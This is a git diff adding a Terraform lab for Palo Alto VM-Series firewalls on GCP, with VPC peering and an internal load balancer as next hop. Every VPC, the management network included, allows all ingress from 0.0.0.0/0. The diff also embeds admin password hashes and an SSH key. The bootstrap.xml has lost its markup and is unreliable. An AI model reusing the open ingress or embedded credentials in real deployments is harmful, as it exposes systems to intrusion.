+ + 10.10.2.2 + + spoke2-vpc + + + + 10.10.1.2 + + spoke1-vpc + + + + 10.10.1.0/24 + + spoke1-vpc + + + + 10.10.2.0/24 + + spoke2-vpc + + + + 192.168.1.2 + + + 192.168.1.3 + + + 10.10.1.100 + + spoke1-vpc + + + + 10.10.1.3 + + spoke1-vpc + + +
+ + + + ethernet1/1 + ethernet1/2 + + + + + + color3 + + + color24 + + + color20 + + + color13 + + + +
+
+
+
+
diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt b/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml new file mode 100644 index 00000000..7e2a3a37 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/bootstrap.xml @@ -0,0 +1,890 @@ + + + + + + $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/ + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 35.191.0.0/16 + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.12.1 + + + None + + ethernet1/1 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + untrust 
+ + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + intrazone + + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + drop + no + yes + + + deny + no + yes + + + + + + + + + + ethernet1/2 + + + + + untrust + + + trust + + + any + + + any + + any + + + + trust + + + trust + + + 35.191.0.0/16 + 130.211.0.0/22 + + + any + + any + ethernet1/1 + + 100.64.0.1 + + + + + + + ethernet1/1 + + + + + trust + + + trust + + + any + + + any + + any + ethernet1/1 + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + client + any + any + + critical + + + any + + + any + + + + + + + client + any + any + + high + + + any + + + any + + + + + + + client + any + any + + medium + + + any + + + any + + + + + + + client + any + any + + informational + + + any + + + any + + + + + + + client + any + any + + low + + + any + + + any + + + + + + + server + any + any + + critical + + + any + + + any + + + + + + + server + any + any + + high + + + any + + + any + + + + + + + server + any + any + + medium + + + any + + + any + + + + + + + server + any + any + + informational + + + any + + + any + + + + + + + server + any + any + + low + + + any + + + any + + + + + + + + + + + + + + diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/deleteme b/gcp/adv-peering-with-lbnh/deleteme new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/deleteme @@ -0,0 +1 @@ + diff --git a/gcp/adv-peering-with-lbnh/guide.pdf b/gcp/adv-peering-with-lbnh/guide.pdf new file mode 100644 index 00000000..bac56ad0 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/guide.pdf differ diff --git a/gcp/adv-peering-with-lbnh/ilbnh.tf b/gcp/adv-peering-with-lbnh/ilbnh.tf new file mode 100644 index 00000000..3c7bc041 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/ilbnh.tf @@ -0,0 +1,67 @@ +provider "google-beta" { + credentials = "${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" + alias = "ilbnh" +} + +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH +#************************************************************************************ +module "bootstrap_ilbnh" { + source = "./modules/create_bootstrap_bucket_ilbnh/" + bucket_name = "vmseries-ilbnh" + randomize_bucket_name = true + file_location = "bootstrap_files_ilbnh/" + enable_ilbnh = "${var.enable_ilbnh}" + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} 
+ +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH +#************************************************************************************ +module "vm_fw_ilbnh" { + source = "./modules/create_vmseries_ilbnh/" + fw_names = ["vmseries03", "vmseries04"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.ilb_trust.subnetwork_self_link[0]}", "${module.ilb_mgmt.subnetwork_self_link[0]}", "${module.ilb_untrust.subnetwork_self_link[0]}"] + enable_ilbnh = "${var.enable_ilbnh}" + fw_nic0_ip = ["192.168.12.4", "192.168.12.5"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.10.4", "192.168.10.5"] + fw_nic2_ip = ["192.168.11.4", "192.168.11.5"] + + fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group" + + dependencies = [ + "${module.bootstrap_ilbnh.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +module "vmseries_internal_lb_ilbnh" { + source = "./modules/create_ilbnh/" + internal_lb_name_ilbnh = "ilbnh" + internal_lb_ports_ilbnh = "22" + subnetworks = ["${module.ilb_trust.subnetwork_self_link[0]}"] + internal_lbnh_ip = "192.168.12.6" + enable_ilbnh = "${var.enable_ilbnh}" + backends = [ + { + group = "${module.vm_fw_ilbnh.instance_group[0]}" + }, + { + group = "${module.vm_fw_ilbnh.instance_group[1]}" + }, + ] +} diff --git a/gcp/adv-peering-with-lbnh/ilbnh_override.tf b/gcp/adv-peering-with-lbnh/ilbnh_override.tf new file mode 100644 index 00000000..d3bb02dd --- /dev/null +++ b/gcp/adv-peering-with-lbnh/ilbnh_override.tf @@ -0,0 +1,7 @@ +#************************************************************************************ +# ILBNH +#************************************************************************************ +variable "enable_ilbnh" { + description = "If set to true, enable ILB as Next Hop" + default = true +} diff --git a/gcp/adv-peering-with-lbnh/images/Overview.png b/gcp/adv-peering-with-lbnh/images/Overview.png new file mode 100644 index 00000000..5c1924ba Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/Overview.png differ diff --git a/gcp/adv-peering-with-lbnh/images/peering.png b/gcp/adv-peering-with-lbnh/images/peering.png new file mode 100644 index 00000000..b4fcae29 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/peering.png differ diff --git a/gcp/adv-peering-with-lbnh/images/routes.png b/gcp/adv-peering-with-lbnh/images/routes.png new file mode 100644 index 00000000..244156c9 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/routes.png differ diff --git a/gcp/adv-peering-with-lbnh/images/web.jpg b/gcp/adv-peering-with-lbnh/images/web.jpg new file mode 100644 index 00000000..16d24561 Binary files /dev/null and b/gcp/adv-peering-with-lbnh/images/web.jpg differ diff --git a/gcp/adv-peering-with-lbnh/main.tf b/gcp/adv-peering-with-lbnh/main.tf new file mode 100644 index 00000000..9233d3e9 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/main.tf @@ -0,0 +1,196 @@ +provider "google" { + credentials = 
"${var.main_project_authfile}" + project = "${var.main_project}" + region = "${var.region}" +} + +#************************************************************************************ +# CREATE VPCS - MGMT, UNTRUST, TRUST +#************************************************************************************ +module "vpc_mgmt" { + source = "./modules/create_vpc/" + vpc_name = "mgmt-vpc" + subnetworks = ["mgmt-subnet"] + ip_cidrs = ["192.168.0.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_untrust" { + source = "./modules/create_vpc/" + vpc_name = "untrust-vpc" + subnetworks = ["untrust-subnet"] + ip_cidrs = ["192.168.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/create_vpc/" + vpc_name = "trust-vpc" + subnetworks = ["trust-subnet"] + ip_cidrs = ["192.168.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "ilb_mgmt" { + source = "./modules/create_vpc/" + vpc_name = "ilb-mgmt-vpc" + subnetworks = ["ilb-mgmt-subnet"] + ip_cidrs = ["192.168.10.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "ilb_untrust" { + source = "./modules/create_vpc/" + vpc_name = "ilb-untrust-vpc" + subnetworks = ["ilb-untrust-subnet"] + ip_cidrs = ["192.168.11.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +module "ilb_trust" { + source = "./modules/create_vpc/" + vpc_name = "ilb-trust-vpc" + subnetworks = ["ilb-trust-subnet"] + ip_cidrs = ["192.168.12.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] +} + +#************************************************************************************ +# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP +#************************************************************************************ +module "bootstrap" { + source = "./modules/create_bootstrap_bucket/" + bucket_name = "vmseries-adv-peering" + randomize_bucket_name = true + file_location = "bootstrap_files/" + + config = ["init-cfg.txt", "bootstrap.xml"] // default [] + license = ["authcodes"] // default [] + # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default [] + # software = ["PanOS_vm-9.0.0"] // default [] +} +#************************************************************************************ +# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) +#************************************************************************************ +module "vm_fw" { + source = "./modules/create_vmseries/" + fw_names = ["vmseries01", "vmseries02"] + fw_machine_type = "n1-standard-4" + fw_zones = ["${var.region}-a", "${var.region}-b"] + fw_subnetworks = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"] + + fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP + fw_nic1_ip = ["192.168.0.2", "192.168.0.3"] + fw_nic2_ip = ["192.168.2.2", "192.168.2.3"] + + fw_bootstrap_bucket = "${module.bootstrap.bucket_name}" + fw_ssh_key = "admin:${var.vmseries_ssh_key}" + fw_image = "${var.vmseries_image}" + + create_instance_group = true + instance_group_names = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group" + + 
dependencies = [ + "${module.bootstrap.completion}", + ] +} + +#************************************************************************************ +# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER +#************************************************************************************ +module "vmseries_public_lb" { + source = "./modules/create_public_lb/" + name = "vmseries-lb" + + backends = { + "0" = [ + { + group = "${module.vm_fw.instance_group[0]}" + }, + { + group = "${module.vm_fw.instance_group[1]}" + }, + ] + } + + backend_params = [ + "/,http,80,10", // health check path, port name, port number, timeout seconds. + ] +} + +#************************************************************************************ +# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2 +#************************************************************************************ +#resource "google_compute_route" "default" { +# count = "${length(module.vm_fw.fw_names)}" +# name = "default-to-${module.vm_fw.fw_names[count.index]}" +# dest_range = "0.0.0.0/0" +# network = "${module.vpc_trust.vpc_self_link}" +# next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}" +# priority = 100 +#} + +#************************************************************************************ +# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2 +#************************************************************************************ +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "trust-to-spoke1" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke1.vpc_self_link}" + + depends_on = [ + "module.vm_spoke1","module.vm_spoke2" + ] +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "trust-to-spoke2" + network = "${module.vpc_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke2.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.trust_to_spoke1", + ] +} +#************************************************************************************ +# CREATE PEERING LINKS ILB-TRUST-to-SPOKE1 / TRUST-to-SPOKE2 +#************************************************************************************ +resource "google_compute_network_peering" "ilb_trust_to_spoke1" { + name = "ilb-trust-to-spoke1" + network = "${module.ilb_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke1.vpc_self_link}" + + depends_on = [ + "google_compute_network_peering.trust_to_spoke2", + ] +} + +resource "google_compute_network_peering" "ilb_trust_to_spoke2" { + name = "ilb-trust-to-spoke2" + network = "${module.ilb_trust.vpc_self_link}" + peer_network = "${module.vpc_spoke2.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.ilb_trust_to_spoke1", + ] +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf new file mode 100644 index 00000000..bfe60b19 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket/main.tf @@ -0,0 +1,120 @@ +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = 
"${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${length(var.config) > 0 ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${length(var.content) > 0 ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${length(var.license) > 0 ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${length(var.software) > 0 ? length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${google_storage_bucket.bootstrap.name}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${length(var.config) == 0 ? 1 : 0 }" + name = "config/" + content = "config/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${length(var.content) == 0 ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${length(var.license) == 0 ? 1 : 0 }" + name = "license/" + content = "license/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${length(var.software) == 0 ? 
1 : 0 }" + name = "software/" + content = "software/" + bucket = "${google_storage_bucket.bootstrap.name}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${google_storage_bucket.bootstrap.name}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf new file mode 100644 index 00000000..23092e2b --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_bootstrap_bucket_ilbnh/main.tf @@ -0,0 +1,124 @@ +variable enable_ilbnh { + default = false +} +variable bucket_name {} + +variable file_location {} + +variable config { + type = "list" + default = [] +} + +variable content { + type = "list" + default = [] +} + +variable license { + type = "list" + default = [] +} + +variable software { + default = [] +} + +variable randomize_bucket_name { + default = false +} + +locals { + bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}" +} + +resource "random_string" "randomstring" { + count = "${var.randomize_bucket_name}" + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + count = "${var.enable_ilbnh ? 1 : 0}" + name = "${local.bucket_name}" + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = "${(length(var.config) > 0 && var.enable_ilbnh) ? length(var.config) : "0" }" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_full" { + count = "${(length(var.content) > 0 && var.enable_ilbnh) ? length(var.content) : "0" }" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_full" { + count = "${(length(var.license) > 0 && var.enable_ilbnh) ? length(var.license) : "0" }" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "software_full" { + count = "${(length(var.software) > 0 && var.enable_ilbnh) ? length(var.software) : "0" }" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} +resource "google_storage_bucket_object" "config_empty" { + count = "${(length(var.config) == 0 && var.enable_ilbnh) ? 
1 : 0 }" + name = "config/" + content = "config/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "content_empty" { + count = "${(length(var.content) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "content/" + content = "content/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "license_empty" { + count = "${(length(var.license) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "license/" + content = "license/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + +resource "google_storage_bucket_object" "software_empty" { + count = "${(length(var.software) == 0 && var.enable_ilbnh) ? 1 : 0 }" + name = "software/" + content = "software/" + bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} + + +resource "null_resource" "dependency_setter" { + depends_on = [ + "google_storage_bucket.bootstrap", + "google_storage_bucket_object.config_full", + "google_storage_bucket_object.content_full", + "google_storage_bucket_object.license_full", + "google_storage_bucket_object.software_full", + "google_storage_bucket_object.config_empty", + "google_storage_bucket_object.content_empty", + "google_storage_bucket_object.license_empty", + "google_storage_bucket_object.software_empty", + ] +} + +output "completion" { + value = "${null_resource.dependency_setter.id}" +} + +output "bucket_name" { + value = "${join(",",google_storage_bucket.bootstrap.*.name)}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf new file mode 100644 index 00000000..49392b2e --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_ilbnh/main.tf @@ -0,0 +1,51 @@ +variable enable_ilbnh { + default = false +} +variable "internal_lb_name_ilbnh" { + default = "ilbnh" +} +variable "internal_lb_ports_ilbnh" { + default = "22" +} +variable backends { + description = "Map backend indices to list of backend maps." + type = "list" +} +variable subnetworks { + type = "list" +} +variable "internal_lbnh_ip" { + default = "" +} +#************************************************************************************ +# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH +#************************************************************************************ +resource "google_compute_health_check" "health_check_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-check" + count = "${var.enable_ilbnh ? 1 : 0}" + + tcp_health_check { + port = "${var.internal_lb_ports_ilbnh}" + } +} + +resource "google_compute_region_backend_service" "backend_service_ilbnh" { + name = "${var.internal_lb_name_ilbnh}" + count = "${var.enable_ilbnh ? 1 : 0}" + health_checks = ["${google_compute_health_check.health_check_ilbnh.self_link}"] + backend = ["${var.backends}"] + session_affinity = "CLIENT_IP" + +} + + +resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" { + name = "${var.internal_lb_name_ilbnh}-all" + count = "${var.enable_ilbnh ? 
1 : 0}" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lbnh_ip}" + ip_protocol = "TCP" + all_ports = true + subnetwork = "${var.subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf b/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf new file mode 100644 index 00000000..961faca1 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_public_lb/main.tf @@ -0,0 +1,168 @@ + +variable project { + description = "The project to deploy to, if not set the default provider project is used." + default = "" +} + +variable ip_version { + description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4" + default = "" +} + +variable name { + description = "Name for the forwarding rule and prefix for supporting resources" +} + +variable backends { + description = "Map backend indices to list of backend maps." + type = "map" +} + +variable backend_params { + description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds" + type = "list" +} + +variable backend_protocol { + description = "The protocol with which to talk to the backend service" + default = "HTTP" +} + +variable create_url_map { + description = "Set to `false` if url_map variable is provided." + default = true +} + +variable url_map { + description = "The url_map resource to use. Default is to send all traffic to first backend." + default = "" +} + +variable http_forward { + description = "Set to `false` to disable HTTP port 80 forward" + default = true +} + +variable ssl { + description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs" + default = false +} + +variable private_key { + description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable certificate { + description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty." + default = "" +} + +variable use_ssl_certificates { + description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`" + default = false +} + +variable ssl_certificates { + type = "list" + description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided." + default = [] +} + +variable security_policy { + description = "The resource URL for the security policy to associate with the backend service" + default = "" +} + +variable cdn { + description = "Set to `true` to enable cdn on backend." + default = "false" +} + + +resource "google_compute_global_forwarding_rule" "http" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}" + target = "${google_compute_target_http_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "80" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_forwarding_rule" "https" { + project = "${var.project}" + count = "${var.ssl ? 
1 : 0}" + name = "${var.name}-https" + target = "${google_compute_target_https_proxy.default.self_link}" + ip_address = "${google_compute_global_address.default.address}" + port_range = "443" + depends_on = ["google_compute_global_address.default"] +} + +resource "google_compute_global_address" "default" { + project = "${var.project}" + name = "${var.name}-address" + ip_version = "${var.ip_version}" +} + +# HTTP proxy when ssl is false +resource "google_compute_target_http_proxy" "default" { + project = "${var.project}" + count = "${var.http_forward ? 1 : 0}" + name = "${var.name}-http-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" +} + +# HTTPS proxy when ssl is true +resource "google_compute_target_https_proxy" "default" { + project = "${var.project}" + count = "${var.ssl ? 1 : 0}" + name = "${var.name}-https-proxy" + url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}" + ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"] +} + +resource "google_compute_ssl_certificate" "default" { + project = "${var.project}" + count = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}" + name_prefix = "${var.name}-certificate-" + private_key = "${var.private_key}" + certificate = "${var.certificate}" + + lifecycle = { + create_before_destroy = true + } +} + +resource "google_compute_url_map" "default" { + project = "${var.project}" + count = "${var.create_url_map ? 1 : 0}" + name = "${var.name}" + default_service = "${google_compute_backend_service.default.0.self_link}" +} + +resource "google_compute_backend_service" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-backend-${count.index}" + port_name = "${element(split(",", element(var.backend_params, count.index)), 1)}" + protocol = "${var.backend_protocol}" + timeout_sec = "${element(split(",", element(var.backend_params, count.index)), 3)}" + backend = ["${var.backends["${count.index}"]}"] + health_checks = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"] + security_policy = "${var.security_policy}" + enable_cdn = "${var.cdn}" +} + +resource "google_compute_http_health_check" "default" { + project = "${var.project}" + count = "${length(var.backend_params)}" + name = "${var.name}-check-${count.index}" + request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}" + port = "${element(split(",", element(var.backend_params, count.index)), 2)}" +} + +output "address" { + value = "${google_compute_global_address.default.address}" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf 